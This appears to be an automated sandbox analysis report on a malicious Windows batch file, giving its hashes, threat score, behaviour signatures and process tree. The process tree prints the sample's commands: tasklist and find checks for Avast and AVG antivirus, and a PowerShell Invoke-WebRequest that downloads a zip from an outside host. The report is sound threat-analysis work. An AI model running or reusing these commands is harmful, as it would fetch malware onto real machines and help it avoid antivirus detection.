Overview

overview

10

Static

static

1

20112024_1640_new.bat

windows7-x64

8

20112024_1640_new.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    239s
  • max time network
    240s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 16:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    20112024_1640_new.bat

  • Size

    3KB

  • MD5

    072bfacf745a6d9d2fcd710dc0eddc2c

  • SHA1

    b926adccaf5181c12713164a57f878316cfcdabc

  • SHA256

    283a4a43c44d9bc096c52ad644bd77f2129e65fbc8e1964e419f39d1cba4386d

  • SHA512

    568f3b32c0839bd4830e22ffad8d50f0cfcea3e294e5d7952132da956c412c33305cc0bca1f5df08848edd4296d3e1d00cb6206a4ef172d5b769b35c49166f4b

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\20112024_1640_new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq AvastUI.exe"
      2⤵
      • Enumerates processes with tasklist
      • Suspicious use of AdjustPrivilegeToken
      PID:2108
    • C:\Windows\system32\find.exe
      find /i "AvastUI.exe"
      2⤵
        PID:2584
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "IMAGENAME eq avgui.exe"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2872
      • C:\Windows\system32\find.exe
        find /i "avgui.exe"
        2⤵
          PID:2876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://timebasebsan.shop:4045/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2812

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2812-4-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2812-5-0x000000001B560000-0x000000001B842000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2812-7-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2812-6-0x0000000002990000-0x0000000002998000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2812-8-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2812-9-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2812-10-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2812-11-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2812-12-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

        Filesize

        9.6MB

        Download